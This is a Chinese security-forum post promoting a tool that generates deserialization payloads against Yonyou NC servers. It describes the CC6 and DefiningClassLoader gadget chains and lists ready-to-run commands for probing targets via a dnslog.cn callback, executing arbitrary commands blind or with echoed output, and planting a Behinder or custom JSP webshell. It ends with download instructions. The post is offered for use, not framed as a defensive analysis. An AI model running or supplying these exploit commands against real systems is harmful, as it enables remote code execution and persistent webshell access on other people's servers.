安全矩阵

 找回密码
 立即注册
搜索
查看: 1634|回复: 0

NC反序列化漏洞payload生成

[复制链接]

145

主题

192

帖子

817

积分

高级会员

Rank: 4

积分
817
发表于 2022-9-10 20:37:48 | 显示全部楼层 |阅读模式
项目作者:Ghost2097221

0x01 前言

无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。

0x02 接口检查功能
  1. java -jar nc6.5.jar http://127.0.0.1 Check
复制代码


0x03 URLDNS构造链探测
  1. java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn
复制代码


编辑
编辑
编辑
0x04 无回显命令执行
  1. java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe
复制代码


编辑
编辑
编辑
0x05 回显命令执行
java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。
编辑
编辑
0x06 落地 webshell
  1. java -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:\Users\Administrator\Pictures\Camera Roll\1.jsp"
复制代码


此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。
编辑
编辑
编辑
0x07 下载地址
1、通过项目地址下载
2、关注web安全工具库公众号,后台回复:20220910



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:20 , Processed in 0.012833 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表